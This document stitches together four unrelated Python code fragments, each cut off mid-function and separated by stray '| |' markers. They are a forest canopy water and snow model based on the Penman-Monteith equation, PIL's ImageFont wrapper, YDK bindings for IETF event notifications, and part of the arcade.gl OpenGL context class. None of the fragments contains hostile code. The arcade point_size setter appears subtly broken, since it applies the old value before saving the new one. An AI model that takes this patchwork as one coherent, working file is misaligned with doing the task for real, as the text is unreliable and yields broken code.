Tr = penman_monteith((1.-tau)*AE, 1e3*D, Ta, Gc, 1./Ra, units='mm')
Tr[Tr < 0] = 0.0
"""--- forest floor evaporation rate--- """
Gcs = self.gsoil
Efloor = beta * penman_monteith(tau * AE, 1e3*D, Ta, Gcs, 1./Ras, units='mm')
Efloor[self.SWE > 0] = 0.0 # no evaporation from floor if snow on ground or beta == 0
return Tr, Efloor, Gc, gs
def canopy_water_snow(self, dt, T, Prec, AE, D, Ra=25.0, U=2.0):
"""
Calculates canopy water interception and SWE during timestep dt
Args:
self - object
dt - timestep [s]
T - air temperature (degC)
Prec - precipitation rate during (mm d-1)
AE - available energy (~net radiation) (Wm-2)
D - vapor pressure deficit (kPa)
Ra - canopy aerodynamic resistance (s m-1)
Returns:
self - updated state W, Wf, SWE, SWEi, SWEl
Infil - potential infiltration to soil profile (mm)
Evap - evaporation / sublimation from canopy store (mm)
MBE - mass balance error (mm)
<NAME> & <NAME> 2014 - 2017
Last edit 12 / 2017
"""
# quality of precipitation
Tmin = self.Tmin # 'C, below all is snow
Tmax = self.Tmax # 'C, above all is water
Tmelt = self.Tmin # 'C, T when melting starts
# storage capacities mm
Wmax = self.wmax * self.LAI
Wmaxsnow = self.wmaxsnow * self.LAI
# melting/freezing coefficients mm/s
Kmelt = self.Kmelt - 1.64 * self.cf / dt # Kuusisto E, '<NAME>'
Kfreeze = self.Kfreeze
kp = self.physpara['kp']
tau = np.exp(-kp*self.LAI) # fraction of Rn at ground
# inputs to arrays, needed for indexing later in the code
gridshape = np.shape(self.LAI) # rows, cols
if np.shape(T) != gridshape:
T = np.ones(gridshape) * T
Prec = np.ones(gridshape) * Prec
# latent heat of vaporization (Lv) and sublimation (Ls) J kg-1
Lv = 1e3 * (3147.5 - 2.37 * (T + 273.15))
Ls = Lv + 3.3e5
# compute 'potential' evaporation / sublimation rates for each grid cell
Ga = 1. / Ra # aerodynamic conductance
# resistance for snow sublimation adopted from:
# Pomeroy et al. 1998 Hydrol proc; Essery et al. 2003 J. Climate;
# Best et al. 2011 Geosci. Mod. Dev.
# ri = (2/3*rhoi*r**2/Dw) / (Ce*Sh*W) == 7.68 / (Ce*Sh*W)
Ce = 0.01*((self.W + eps) / Wmaxsnow)**(-0.4) # exposure coeff (-)
Sh = (1.79 + 3.0*U**0.5) # Sherwood numbner (-)
gi = np.where(T <= Tmin, Sh*self.W*Ce / 7.68 + eps, 1e6) # m s-1
Lambda = np.where(T <= Tmin, Ls, Lv)
# evaporation of interception storage, mm
erate = np.where(Prec==0,
dt / Lambda * penman_monteith((1.0 - tau)*AE, 1e3*D, T, gi, Ga, units='W'),
0.0)
# ---state of precipitation [as water (fW) or as snow(fS)]
fW = np.where(T >= Tmax, 1.0, 0.0)
ix = ((T > Tmin) & (T < Tmax))
fW[ix] = (T[ix] - Tmin) / (Tmax - Tmin)
fS = 1.0 - fW
# correction of precipitation
Prec = Prec * fW + Prec * fS * self.cs
""" --- initial conditions for calculating mass balance error --"""
Wo = self.W # canopy storage
SWEo = self.SWE # Snow water equivalent mm
""" --------- Canopy water storage change -----"""
# snow unloading from canopy, ensures also that seasonal LAI development does
# not mess up computations
# Unload = np.where(T >= Tmax, np.maximum(self.W - Wmax, 0.0), 0.0)
Unload = np.where(T >= Tmin, np.maximum(self.W - Wmax, 0.0), np.maximum(self.W - Wmaxsnow, 0.0))
self.W = self.W - Unload
# Interception of rain or snow: asymptotic approach of saturation.
# Hedstrom & Pomeroy 1998. Hydrol. Proc 12, 1611-1625;
# Koivusalo & Kokkonen 2002 J.Hydrol. 262, 145-164.
# above Tmin, interception capacity equals that of liquid precip
Interc = np.where(T < Tmin,
(Wmaxsnow - self.W)* (1.0 - np.exp(-(self.cf / Wmaxsnow) * Prec)),
np.maximum(0.0, (Wmax - self.W))* (1.0 - np.exp(-(self.cf / Wmax) * Prec)))
self.W = self.W + Interc # new canopy storage, mm
Trfall = Prec + Unload - Interc # Throughfall to field layer or snowpack
# evaporate from canopy and update storage
Evap = np.minimum(erate, self.W) # mm
self.W = self.W - Evap
""" Snowpack (in case no snow, all Trfall routed to floor) """
# melting positive, freezing negative
Melt_Freeze = np.where(T >= Tmelt,
np.minimum(self.SWEi, Kmelt * dt * (T - Tmelt)),
-np.minimum(self.SWEl, Kfreeze * dt * (Tmelt - T)))
# amount of water as ice and liquid in snowpack
Sice = np.maximum(0.0, self.SWEi + fS * Trfall - Melt_Freeze)
Sliq = np.maximum(0.0, self.SWEl + fW * Trfall + Melt_Freeze)
PotInf = np.maximum(0.0, Sliq - Sice * self.R) # mm
Sliq = np.maximum(0.0, Sliq - PotInf) # mm, liquid water in snow
# update Snowpack state variables
self.SWEl = Sliq
self.SWEi = Sice
self.SWE = self.SWEl + self.SWEi
# mass-balance error mm
MBE = (self.W + self.SWE) - (Wo + SWEo) - (Prec - Evap - PotInf)
return PotInf, Trfall, Evap, Interc, MBE, erate, Unload, fS + fW
""" *********** utility functions ******** """
# @staticmethod
def degreeDays(dd0, T, Tbase, doy):
"""
Calculates degree-day sum from the current mean Tair.
INPUT:
dd0 - previous degree-day sum (degC)
T - daily mean temperature (degC)
Tbase - base temperature at which accumulation starts (degC)
doy - day of year 1...366 (integer)
OUTPUT:
x - degree-day sum (degC)
"""
if doy == 1: # reset in the beginning of the year
dd0 = 0.
return dd0 + max(0, T - Tbase)
# @staticmethod
def eq_evap(AE, T, P=101300.0, units='W'):
"""
Calculates the equilibrium evaporation according to McNaughton & Spriggs,\
1986.
INPUT:
AE - Available energy (Wm-2)
T - air temperature (degC)
P - pressure (Pa)
units - W (Wm-2), mm (mms-1=kg m-2 s-1), mol (mol m-2 s-1)
OUTPUT:
equilibrium evaporation rate (Wm-2)
"""
Mw = 18e-3 # kg mol-1
# latent heat of vaporization of water [J/kg]
L = 1e3 * (2500.8 - 2.36 * T + 1.6e-3 * T ** 2 - 6e-5 * T ** 3)
# latent heat of sublimation [J/kg]
if T < 0:
L = 1e3 * (2834.1 - 0.29 * T - 0.004 * T ** 2)
_, s, g = e_sat(T, P)
x = np.divide((AE * s), (s + g)) # Wm-2 = Js-1m-2
if units == 'mm':
x = x / L # kg m-2 s-1 = mm s-1
elif units == 'mol':
x = x / L / Mw # mol m-2 s-1
x = np.maximum(x, 0.0)
return x
# @staticmethod
def e_sat(T, P=101300, Lambda=2450e3):
"""
Computes saturation vapor pressure (Pa), slope of vapor pressure curve
[Pa K-1] and psychrometric constant [Pa K-1]
IN:
T - air temperature (degC)
P - ambient pressure (Pa)
Lambda - lat heat of vapor [J/kg]
OUT:
esa - saturation vapor pressure in Pa
s - slope of saturation vapor pressure curve (Pa K-1)
g - psychrometric constant (Pa K-1)
"""
cp = 1004.67 # J/kg/K
esa = 1e3 * 0.6112 * np.exp((17.67 * T) / (T + 273.16 - 29.66)) # Pa
s = 17.502 * 240.97 * esa / ((240.97 + T) ** 2)
g = P * cp / (0.622 * Lambda)
return esa, s, g
# @staticmethod
def penman_monteith(AE, D, T, Gs, Ga, P=101300.0, units='W'):
"""
Computes latent heat flux LE (Wm-2) i.e evapotranspiration rate ET (mm/s)
from Penman-Monteith equation
INPUT:
AE - available energy [Wm-2]
VPD - vapor pressure deficit [Pa]
T - ambient air temperature [degC]
Gs - surface conductance [ms-1]
Ga - aerodynamic conductance [ms-1]
P - ambient pressure [Pa]
units - W (Wm-2), mm (mms-1=kg m-2 s-1), mol (mol m-2 s-1)
OUTPUT:
x - evaporation rate in 'units'
"""
# --- | |
<reponame>ashutoshsuman99/Web-Blog-D19
#
# The Python Imaging Library.
# $Id$
#
# PIL raster font management
#
# History:
# 1996-08-07 fl created (experimental)
# 1997-08-25 fl minor adjustments to handle fonts from pilfont 0.3
# 1999-02-06 fl rewrote most font management stuff in C
# 1999-03-17 fl take pth files into account in load_path (from <NAME>)
# 2001-02-17 fl added freetype support
# 2001-05-09 fl added TransposedFont wrapper class
# 2002-03-04 fl make sure we have a "L" or "1" font
# 2002-12-04 fl skip non-directory entries in the system path
# 2003-04-29 fl add embedded default font
# 2003-09-27 fl added support for truetype charmap encodings
#
# Todo:
# Adapt to PILFONT2 format (16-bit fonts, compressed, single file)
#
# Copyright (c) 1997-2003 by Secret Labs AB
# Copyright (c) 1996-2003 by <NAME>
#
# See the README file for information on usage and redistribution.
#
from . import Image
from ._util import isDirectory, isPath, py3
import os
import sys
LAYOUT_BASIC = 0
LAYOUT_RAQM = 1
class _imagingft_not_installed(object):
# module placeholder
def __getattr__(self, id):
raise ImportError("The _imagingft C module is not installed")
try:
from . import _imagingft as core
except ImportError:
core = _imagingft_not_installed()
# FIXME: add support for pilfont2 format (see FontFile.py)
# --------------------------------------------------------------------
# Font metrics format:
# "PILfont" LF
# fontdescriptor LF
# (optional) key=value... LF
# "DATA" LF
# binary data: 256*10*2 bytes (dx, dy, dstbox, srcbox)
#
# To place a character, cut out srcbox and paste at dstbox,
# relative to the character position. Then move the character
# position according to dx, dy.
# --------------------------------------------------------------------
class ImageFont(object):
"PIL font wrapper"
def _load_pilfont(self, filename):
with open(filename, "rb") as fp:
for ext in (".png", ".gif", ".pbm"):
try:
fullname = os.path.splitext(filename)[0] + ext
image = Image.open(fullname)
except Exception:
pass
else:
if image and image.mode in ("1", "L"):
break
else:
raise IOError("cannot find glyph data file")
self.file = fullname
return self._load_pilfont_data(fp, image)
def _load_pilfont_data(self, file, image):
# read PILfont header
if file.readline() != b"PILfont\n":
raise SyntaxError("Not a PILfont file")
file.readline().split(b";")
self.info = [] # FIXME: should be a dictionary
while True:
s = file.readline()
if not s or s == b"DATA\n":
break
self.info.append(s)
# read PILfont metrics
data = file.read(256 * 20)
# check image
if image.mode not in ("1", "L"):
raise TypeError("invalid font image mode")
image.load()
self.font = Image.core.font(image.im, data)
def getsize(self, text, *args, **kwargs):
return self.font.getsize(text)
def getmask(self, text, mode="", *args, **kwargs):
return self.font.getmask(text, mode)
##
# Wrapper for FreeType fonts. Application code should use the
# <b>truetype</b> factory function to create font objects.
class FreeTypeFont(object):
"FreeType font wrapper (requires _imagingft service)"
def __init__(self, font=None, size=10, index=0, encoding="", layout_engine=None):
# FIXME: use service provider instead
self.path = font
self.size = size
self.index = index
self.encoding = encoding
if layout_engine not in (LAYOUT_BASIC, LAYOUT_RAQM):
layout_engine = LAYOUT_BASIC
if core.HAVE_RAQM:
layout_engine = LAYOUT_RAQM
elif layout_engine == LAYOUT_RAQM and not core.HAVE_RAQM:
layout_engine = LAYOUT_BASIC
self.layout_engine = layout_engine
def load_from_bytes(f):
self.font_bytes = f.read()
self.font = core.getfont(
"", size, index, encoding, self.font_bytes, layout_engine
)
if isPath(font):
if sys.platform == "win32":
font_bytes_path = font if isinstance(font, bytes) else font.encode()
try:
font_bytes_path.decode("ascii")
except UnicodeDecodeError:
# FreeType cannot load fonts with non-ASCII characters on Windows
# So load it into memory first
with open(font, "rb") as f:
load_from_bytes(f)
return
self.font = core.getfont(
font, size, index, encoding, layout_engine=layout_engine
)
else:
load_from_bytes(font)
def _multiline_split(self, text):
split_character = "\n" if isinstance(text, str) else b"\n"
return text.split(split_character)
def getname(self):
"""
:return: A tuple of the font family (e.g. Helvetica) and the font style
(e.g. Bold)
"""
return self.font.family, self.font.style
def getmetrics(self):
"""
:return: A tuple of the font ascent (the distance from the baseline to
the highest outline point) and descent (the distance from the
baseline to the lowest outline point, a negative value)
"""
return self.font.ascent, self.font.descent
def getsize(self, text, direction=None, features=None, language=None):
"""
Returns width and height (in pixels) of given text if rendered in font with
provided direction, features, and language.
:param text: Text to measure.
:param direction: Direction of the text. It can be 'rtl' (right to
left), 'ltr' (left to right) or 'ttb' (top to bottom).
Requires libraqm.
.. versionadded:: 4.2.0
:param features: A list of OpenType font features to be used during text
layout. This is usually used to turn on optional
font features that are not enabled by default,
for example 'dlig' or 'ss01', but can be also
used to turn off default font features for
example '-liga' to disable ligatures or '-kern'
to disable kerning. To get all supported
features, see
https://docs.microsoft.com/en-us/typography/opentype/spec/featurelist
Requires libraqm.
.. versionadded:: 4.2.0
:param language: Language of the text. Different languages may use
different glyph shapes or ligatures. This parameter tells
the font which language the text is in, and to apply the
correct substitutions as appropriate, if available.
It should be a `BCP 47 language code
<https://www.w3.org/International/articles/language-tags/>`
Requires libraqm.
.. versionadded:: 6.0.0
:return: (width, height)
"""
size, offset = self.font.getsize(text, direction, features, language)
return (size[0] + offset[0], size[1] + offset[1])
def getsize_multiline(
self, text, direction=None, spacing=4, features=None, language=None
):
"""
Returns width and height (in pixels) of given text if rendered in font
with provided direction, features, and language, while respecting
newline characters.
:param text: Text to measure.
:param direction: Direction of the text. It can be 'rtl' (right to
left), 'ltr' (left to right) or 'ttb' (top to bottom).
Requires libraqm.
:param spacing: The vertical gap between lines, defaulting to 4 pixels.
:param features: A list of OpenType font features to be used during text
layout. This is usually used to turn on optional
font features that are not enabled by default,
for example 'dlig' or 'ss01', but can be also
used to turn off default font features for
example '-liga' to disable ligatures or '-kern'
to disable kerning. To get all supported
features, see
https://docs.microsoft.com/en-us/typography/opentype/spec/featurelist
Requires libraqm.
:param language: Language of the text. Different languages may use
different glyph shapes or ligatures. This parameter tells
the font which language the text is in, and to apply the
correct substitutions as appropriate, if available.
It should be a `BCP 47 language code
<https://www.w3.org/International/articles/language-tags/>`
Requires libraqm.
.. versionadded:: 6.0.0
:return: (width, height)
"""
max_width = 0
lines = self._multiline_split(text)
line_spacing = self.getsize("A")[1] + spacing
for line in lines:
line_width, line_height = self.getsize(line, direction, features, language)
max_width = max(max_width, line_width)
return max_width, len(lines) * line_spacing - spacing
def getoffset(self, text):
"""
Returns the offset of given text. This is the gap between the
starting coordinate and the first marking. Note that this gap is
included in the result of :py:func:`~PIL.ImageFont.FreeTypeFont.getsize`.
:param text: Text to measure.
:return: A tuple of the x and y offset
"""
return self.font.getsize(text)[1]
def getmask(self, text, mode="", direction=None, features=None, language=None):
"""
Create a bitmap for the text.
If the font uses antialiasing, the bitmap should have mode ``L`` and use a
maximum value of 255. Otherwise, it should have mode ``1``.
:param text: Text to render.
:param mode: Used by some graphics drivers to indicate what mode the
driver prefers; if empty, the renderer may return either
mode. Note that the mode is always a string, to simplify
C-level implementations.
.. versionadded:: 1.1.5
:param direction: Direction of the text. It can be 'rtl' (right to
left), 'ltr' (left to right) or 'ttb' (top to bottom).
Requires libraqm.
.. versionadded:: 4.2.0
:param features: A list of OpenType font features to be used during text
layout. This is usually used to turn on optional
font features that are not enabled by default,
for example 'dlig' or 'ss01', but can be also
used to turn off default font features for
example '-liga' to disable ligatures or '-kern'
to disable kerning. To get all supported
features, see
https://docs.microsoft.com/en-us/typography/opentype/spec/featurelist
Requires libraqm.
.. versionadded:: 4.2.0
:param language: Language of the text. Different languages may use
different glyph shapes or ligatures. This parameter tells
the font which language the text is in, and to apply the
correct substitutions as appropriate, if available.
It should be a `BCP 47 language code
<https://www.w3.org/International/articles/language-tags/>`
Requires libraqm.
.. versionadded:: 6.0.0
:return: An internal PIL storage memory instance as defined by the
:py:mod:`PIL.Image.core` interface | |
<ydk.models.ietf.ietf_event_notifications.DeleteSubscription.Input>`
.. attribute:: output
**type**\: :py:class:`Output <ydk.models.ietf.ietf_event_notifications.DeleteSubscription.Output>`
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
super(DeleteSubscription, self).__init__()
self._top_entity = None
self.yang_name = "delete-subscription"
self.yang_parent_name = "ietf-event-notifications"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict()
self.input = DeleteSubscription.Input()
self.input.parent = self
self._children_name_map["input"] = "input"
self.output = DeleteSubscription.Output()
self.output.parent = self
self._children_name_map["output"] = "output"
self._segment_path = lambda: "ietf-event-notifications:delete-subscription"
self._is_frozen = True
class Input(Entity):
"""
.. attribute:: subscription_id
Identifier of the subscription that is to be deleted. Only subscriptions that were created using establish\-subscription can be deleted via this RPC
**type**\: int
**range:** 0..4294967295
**mandatory**\: True
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
super(DeleteSubscription.Input, self).__init__()
self.yang_name = "input"
self.yang_parent_name = "delete-subscription"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('subscription_id', (YLeaf(YType.uint32, 'subscription-id'), ['int'])),
])
self.subscription_id = None
self._segment_path = lambda: "input"
self._absolute_path = lambda: "ietf-event-notifications:delete-subscription/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(DeleteSubscription.Input, ['subscription_id'], name, value)
class Output(Entity):
"""
.. attribute:: subscription_result
Indicates whether subscription is operational, or if a problem was encountered
**type**\: :py:class:`SubscriptionResult <ydk.models.ietf.ietf_event_notifications.SubscriptionResult>`
**mandatory**\: True
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
super(DeleteSubscription.Output, self).__init__()
self.yang_name = "output"
self.yang_parent_name = "delete-subscription"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('subscription_result', (YLeaf(YType.identityref, 'subscription-result'), [('ydk.models.ietf.ietf_event_notifications', 'SubscriptionResult')])),
])
self.subscription_result = None
self._segment_path = lambda: "output"
self._absolute_path = lambda: "ietf-event-notifications:delete-subscription/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(DeleteSubscription.Output, ['subscription_result'], name, value)
def clone_ptr(self):
self._top_entity = DeleteSubscription()
return self._top_entity
class Streams(Entity):
"""
This container contains a leaf list of built\-in
streams that are provided by the system.
.. attribute:: stream
Identifies the built\-in streams that are supported by the system. Built\-in streams are associated with their own identities, each of which carries a special semantics. In case configurable custom streams are supported, as indicated by the custom\-stream identity, the configuration of those custom streams is provided separately
**type**\: list of :py:class:`Stream <ydk.models.ietf.ietf_event_notifications.Stream>`
**config**\: False
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
super(Streams, self).__init__()
self._top_entity = None
self.yang_name = "streams"
self.yang_parent_name = "ietf-event-notifications"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('stream', (YLeafList(YType.identityref, 'stream'), [('ydk.models.ietf.ietf_event_notifications', 'Stream')])),
])
self.stream = []
self._segment_path = lambda: "ietf-event-notifications:streams"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Streams, ['stream'], name, value)
def clone_ptr(self):
self._top_entity = Streams()
return self._top_entity
class Filters(Entity):
"""
This container contains a list of configurable filters
that can be applied to subscriptions. This facilitates
the reuse of complex filters once defined.
.. attribute:: filter
A list of configurable filters that can be applied to subscriptions
**type**\: list of :py:class:`Filter <ydk.models.ietf.ietf_event_notifications.Filters.Filter>`
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
super(Filters, self).__init__()
self._top_entity = None
self.yang_name = "filters"
self.yang_parent_name = "ietf-event-notifications"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("filter", ("filter", Filters.Filter))])
self._leafs = OrderedDict()
self.filter = YList(self)
self._segment_path = lambda: "ietf-event-notifications:filters"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Filters, [], name, value)
class Filter(Entity):
"""
A list of configurable filters that can be applied to
subscriptions.
.. attribute:: filter_id (key)
An identifier to differentiate between filters
**type**\: int
**range:** 0..4294967295
.. attribute:: filter
Filter per RFC 5277. Notification filter. If a filter element is specified to look for data of a particular value, and the data item is not present within a particular event notification for its value to be checked against, the notification will be filtered out. For example, if one were to check for 'severity=critical' in a configuration event notification where this field was not supported, then the notification would be filtered out. For subtree filtering, a non\-empty node set means that the filter matches. For XPath filtering, the mechanisms defined in [XPATH] should be used to convert the returned value to boolean
**type**\: anyxml
.. attribute:: subtree_filter
Subtree\-filter used to specify the data nodes targeted for subscription within a subtree, or subtrees, of a conceptual YANG datastore. Objects matching the filter criteria will traverse the filter. The syntax follows the subtree filter syntax specified in RFC 6241, section 6
**type**\: anyxml
.. attribute:: xpath_filter
Xpath defining the data items of interest
**type**\: str
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
super(Filters.Filter, self).__init__()
self.yang_name = "filter"
self.yang_parent_name = "filters"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['filter_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('filter_id', (YLeaf(YType.uint32, 'filter-id'), ['int'])),
('filter', (YLeaf(YType.str, 'filter'), ['str'])),
('subtree_filter', (YLeaf(YType.str, 'ietf-yang-push:subtree-filter'), ['str'])),
('xpath_filter', (YLeaf(YType.str, 'ietf-yang-push:xpath-filter'), ['str'])),
])
self.filter_id = None
self.filter = None
self.subtree_filter = None
self.xpath_filter = None
self._segment_path = lambda: "filter" + "[filter-id='" + str(self.filter_id) + "']"
self._absolute_path = lambda: "ietf-event-notifications:filters/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Filters.Filter, ['filter_id', 'filter', 'subtree_filter', 'xpath_filter'], name, value)
def clone_ptr(self):
self._top_entity = Filters()
return self._top_entity
class SubscriptionConfig(Entity):
"""
Contains the list of subscriptions that are configured,
as opposed to established via RPC or other means.
.. attribute:: subscription
Content of a subscription
**type**\: list of :py:class:`Subscription <ydk.models.ietf.ietf_event_notifications.SubscriptionConfig.Subscription>`
"""
_prefix = 'notif-bis'
_revision = '2016-10-27'
def __init__(self):
super(SubscriptionConfig, self).__init__()
self._top_entity = None
self.yang_name = "subscription-config"
self.yang_parent_name = "ietf-event-notifications"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("subscription", ("subscription", SubscriptionConfig.Subscription))])
self._leafs = OrderedDict()
self.subscription = YList(self)
self._segment_path = lambda: "ietf-event-notifications:subscription-config"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(SubscriptionConfig, [], name, value)
class Subscription(Entity):
"""
Content of a subscription.
.. attribute:: subscription_id (key)
Identifier to use for this subscription
**type**\: int
**range:** 0..4294967295
.. attribute:: stream
Indicates which stream of events is of interest. If not present, events in the default NETCONF stream will be sent
**type**\: :py:class:`Stream <ydk.models.ietf.ietf_event_notifications.Stream>`
.. attribute:: encoding
The type of encoding for the subscribed data. Default is XML
**type**\: :py:class:`Encodings <ydk.models.ietf.ietf_event_notifications.Encodings>`
**default value**\: encode-xml
.. attribute:: filter
Filter per RFC 5277. Notification filter. If a filter element is specified to look for data of a particular value, and the data item is not present within a particular event notification for its value to be checked against, the notification will be filtered out. For example, if one were to check for 'severity=critical' in a configuration event notification where this field was not supported, then the notification would be filtered out. For subtree filtering, a non\-empty node set means that the filter matches. For XPath filtering, the mechanisms defined in [XPATH] should be used to convert the returned value to boolean
**type**\: anyxml
.. attribute:: filter_ref
References filter which is associated with the subscription
**type**\: int
**range:** 0..4294967295
**refers to**\: :py:class:`filter_id <ydk.models.ietf.ietf_event_notifications.Filters.Filter>`
.. attribute:: subtree_filter
Subtree\-filter used to specify the data nodes targeted for subscription within a subtree, or subtrees, of a conceptual YANG datastore. Objects matching the filter criteria will traverse the filter. The syntax follows the subtree filter syntax specified in RFC 6241, section 6
**type**\: anyxml
.. attribute:: xpath_filter
Xpath defining the data items of interest
**type**\: str
.. attribute:: starttime
Used to trigger the replay feature and indicate that the replay should start at the time specified. If <startTime> is not present, this is not a replay subscription. It is not valid to specify start times that are later than the current time. If the <startTime> specified is earlier than the log can support, the replay will begin with the earliest available notification. This parameter is of type dateTime and compliant to [RFC3339]. Implementations must support time zones
**type**\: str
**pattern:** \\d{4}\-\\d{2}\-\\d{2}T\\d{2}\:\\d{2}\:\\d{2}(\\.\\d+)?(Z\|[\\+\\\-]\\d{2}\:\\d{2})
.. attribute:: stoptime
Used with the | |
present) and subsequently used for tessellation.
:type: int
"""
value = c_int()
gl.glGetIntegerv(gl.GL_PATCH_VERTICES, value)
return value.value
@patch_vertices.setter
def patch_vertices(self, value: int):
if not isinstance(value, int):
raise TypeError("patch_vertices must be an integer")
gl.glPatchParameteri(gl.GL_PATCH_VERTICES, value)
@property
def point_size(self) -> float:
"""float: Get or set the point size."""
return self._point_size
@point_size.setter
def point_size(self, value: float):
gl.glPointSize(self._point_size)
self._point_size = value
@property
def primitive_restart_index(self) -> int:
"""Get or set the primitive restart index. Default is -1"""
return self._primitive_restart_index
@primitive_restart_index.setter
def primitive_restart_index(self, value: int):
self._primitive_restart_index = value
gl.glPrimitiveRestartIndex(value)
def finish(self) -> None:
"""Wait until all OpenGL rendering commands are completed"""
gl.glFinish()
# --- Resource methods ---
def buffer(
self, *, data: Optional[Any] = None, reserve: int = 0, usage: str = "static"
) -> Buffer:
"""Create a new OpenGL Buffer object.
:param Any data: The buffer data, This can be ``bytes`` or an object supporting the buffer protocol.
:param int reserve: The number of bytes reserve
:param str usage: Buffer usage. 'static', 'dynamic' or 'stream'
:rtype: :py:class:`~arcade.gl.Buffer`
"""
# create_with_size
return Buffer(self, data, reserve=reserve, usage=usage)
def framebuffer(
self,
*,
color_attachments: Union[Texture, List[Texture]] = None,
depth_attachment: Texture = None
) -> Framebuffer:
"""Create a Framebuffer.
:param List[arcade.gl.Texture] color_attachments: List of textures we want to render into
:param arcade.gl.Texture depth_attachment: Depth texture
:rtype: :py:class:`~arcade.gl.Framebuffer`
"""
return Framebuffer(
self, color_attachments=color_attachments, depth_attachment=depth_attachment
)
def texture(
self,
size: Tuple[int, int],
*,
components: int = 4,
dtype: str = "f1",
data: Any = None,
wrap_x: gl.GLenum = None,
wrap_y: gl.GLenum = None,
filter: Tuple[gl.GLenum, gl.GLenum] = None
) -> Texture:
"""Create a 2D Texture.
Wrap modes: ``GL_REPEAT``, ``GL_MIRRORED_REPEAT``, ``GL_CLAMP_TO_EDGE``, ``GL_CLAMP_TO_BORDER``
Minifying filters: ``GL_NEAREST``, ``GL_LINEAR``, ``GL_NEAREST_MIPMAP_NEAREST``, ``GL_LINEAR_MIPMAP_NEAREST``
``GL_NEAREST_MIPMAP_LINEAR``, ``GL_LINEAR_MIPMAP_LINEAR``
Magnifying filters: ``GL_NEAREST``, ``GL_LINEAR``
:param Tuple[int, int] size: The size of the texture
:param int components: Number of components (1: R, 2: RG, 3: RGB, 4: RGBA)
:param str dtype: The data type of each component: f1, f2, f4 / i1, i2, i4 / u1, u2, u4
:param Any data: The texture data (optional). Can be bytes or an object supporting the buffer protocol.
:param GLenum wrap_x: How the texture wraps in x direction
:param GLenum wrap_y: How the texture wraps in y direction
:param Tuple[GLenum,GLenum] filter: Minification and magnification filter
"""
return Texture(
self,
size,
components=components,
data=data,
dtype=dtype,
wrap_x=wrap_x,
wrap_y=wrap_y,
filter=filter,
)
def depth_texture(self, size: Tuple[int, int], *, data=None) -> Texture:
"""Create a 2D depth texture
:param Tuple[int, int] size: The size of the texture
:param Any data: The texture data (optional). Can be bytes or an object supporting the buffer protocol.
"""
return Texture(self, size, data=data, depth=True)
def geometry(
self,
content: Optional[Sequence[BufferDescription]] = None,
index_buffer: Buffer = None,
mode: int = None,
index_element_size: int = 4,
):
"""
Create a Geomtry instance.
:param list content: List of :py:class:`~arcade.gl.BufferDescription` (optional)
:param Buffer index_buffer: Index/element buffer (optional)
:param int mode: The default draw mode (optional)
:param int mode: The default draw mode (optional)
:param int index_element_size: Byte size of the index buffer type. Can be 1, 2 or 4 (8, 16 or 32 bit unsigned integer)
"""
return Geometry(self, content, index_buffer=index_buffer, mode=mode, index_element_size=index_element_size)
def program(
self,
*,
vertex_shader: str,
fragment_shader: str = None,
geometry_shader: str = None,
tess_control_shader: str = None,
tess_evaluation_shader: str = None,
defines: Dict[str, str] = None
) -> Program:
"""Create a :py:class:`~arcade.gl.Program` given the vertex, fragment and geometry shader.
:param str vertex_shader: vertex shader source
:param str fragment_shader: fragment shader source (optional)
:param str geometry_shader: geometry shader source (optional)
:param str tess_control_shader: tessellation control shader source (optional)
:param str tess_evaluation_shader: tessellation evaluation shader source (optional)
:param dict defines: Substitute #defines values in the source (optional)
:rtype: :py:class:`~arcade.gl.Program`
"""
source_vs = ShaderSource(vertex_shader, gl.GL_VERTEX_SHADER)
source_fs = (
ShaderSource(fragment_shader, gl.GL_FRAGMENT_SHADER)
if fragment_shader
else None
)
source_geo = (
ShaderSource(geometry_shader, gl.GL_GEOMETRY_SHADER)
if geometry_shader
else None
)
source_tc = (
ShaderSource(tess_control_shader, gl.GL_TESS_CONTROL_SHADER)
if tess_control_shader
else None
)
source_te = (
ShaderSource(tess_evaluation_shader, gl.GL_TESS_EVALUATION_SHADER)
if tess_evaluation_shader
else None
)
# If we don't have a fragment shader we are doing transform feedback.
# When a geometry shader is present the out attributes will be located there
out_attributes = [] # type: List[str]
if not source_fs:
if source_geo:
out_attributes = source_geo.out_attributes
else:
out_attributes = source_vs.out_attributes
return Program(
self,
vertex_shader=source_vs.get_source(defines=defines),
fragment_shader=source_fs.get_source(defines=defines)
if source_fs
else None,
geometry_shader=source_geo.get_source(defines=defines)
if source_geo
else None,
tess_control_shader=source_tc.get_source(defines=defines)
if source_tc
else None,
tess_evaluation_shader=source_te.get_source(defines=defines)
if source_te
else None,
out_attributes=out_attributes,
)
def query(self):
"""
Create a query object for measuring rendering calls in opengl.
:rtype: :py:class:`~arcade.gl.Query`
"""
return Query(self)
class ContextStats:
def __init__(self, warn_threshold=100):
self.warn_threshold = warn_threshold
# (created, freed)
self.texture = (0, 0)
self.framebuffer = (0, 0)
self.buffer = (0, 0)
self.program = (0, 0)
